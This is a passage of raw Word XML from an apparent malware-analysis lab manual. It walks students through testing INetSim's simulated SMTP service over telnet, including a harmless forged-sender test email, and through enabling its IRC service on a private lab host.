      </w:r>
    </w:p>
    <w:p w14:paraId="7236F674" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>telnet 172.16.220.130 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4199C2E4" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Trying 172.16.220.130...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D67D52" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Connected to 172.16.220.130.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39927A1F" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363CE1B" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>220 mail.inetsim.org INetSim Mail Service ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6A94A" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F960A9" w14:textId="5A568883" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initiate an SMTP mail request using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>EHLO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command and specif</w:t>
      </w:r>
      <w:r w:rsidR="00D659F2">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>ing a mail server to use (any domain can be specified):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511D42A" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EHLO mail.microsoft.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78052DD0" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-mail.inetsim.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB8D9A" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-HELP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3455B1" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-EXPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C82DD0" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-ENHANCEDSTATUSCODES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792351E" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-DSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C8E59" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-8BITMIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDCCFE" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-SIZE 102400000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DEBE4" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-ETRN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FF4578" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-VRFY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18FCEA" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250-AUTH PLAIN LOGIN ANONYMOUS CRAM-MD5 CRAM-SHA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB5B33" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250 STARTTLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B7099" w14:textId="2B4053DE" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">MAIL FROM: </w:t>
      </w:r>
      <w:r w:rsidR="00D659F2">
        <w:t>command to specify a recipient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB35B2" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MAIL FROM: bill.gates@microsoft.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77E76C" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250 2.1.0 Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74988373" w14:textId="474A0361" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A regular mail server would produce an error, </w:t>
      </w:r>
      <w:r w:rsidR="00D659F2">
        <w:t xml:space="preserve">because </w:t>
      </w:r>
      <w:r>
        <w:t>sending mail from this domain would not be allowed. However, as you can see, this is accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7C964" w14:textId="30D66F63" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">RCPT TO: </w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t>command to specify a recipient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F70D0" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RCPT TO: steve.jobs@apple.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7C270" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250 2.1.5 Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3FEB8" w14:textId="05088C08" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>DATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command to specify the body of the e-mail, using</w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t xml:space="preserve"> a period</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to end t</w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t>he data input</w:t>
      </w:r>
      <w:r w:rsidR="005C7198">
        <w:t xml:space="preserve"> *note you don’t type in the section with 354 etc*</w:t>
      </w:r>
      <w:r w:rsidR="00332EE6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E3AFF" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA0328" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hey Steve,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7EA0D" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0ACA5D" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>You haven't coded a day in your life, have you?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802433B" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D9E236" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cheers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7F8CD" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A09960" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Bill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28EDF7" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193DDA66" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>250 2.6.0 Ok: queued as EF26057A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F04156" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4007689E" w14:textId="78145120" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00423726">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As you can see, the response specifies that the e-mail has been queued. All received commands have been accepted and are recorded in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>/var/log/inetsim/service.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B8970" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="005927A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc472375407"/>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Instructor sign-off:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925E706" w14:textId="695DBEEF" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc24514476"/>
      <w:r>
        <w:t>IRC Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0CE7AE2F" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IRC is another emulated service, but it is not enabled by default. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C973C" w14:textId="42FBCDB6" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kill the current instance of INetSim by using </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t xml:space="preserve">CTRL+C </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and open the INetSim configuration file in </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2182">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>/etc/inetsim/inetsim.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4E55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>using your favorite editor (</w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t xml:space="preserve">requires </w:t>
      </w:r>
      <w:r>
        <w:t>sudo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2D2A2" w14:textId="41FBD348" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2182">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Droid Sans" w:hAnsi="Courier New" w:cs="FreeSans"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>#start_service irc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> line, remove the comment character (#), save the file, and </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r>
        <w:t>re-initiate INetSim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB751D0" w14:textId="28790ACB" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Using telnet, connect to the R</w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>EM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nux instance again on port </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2182">
        <w:t>6667</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0059AB4D" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>telnet 172.16.220.130 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D558F" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Trying 172.16.220.130...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998055A" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
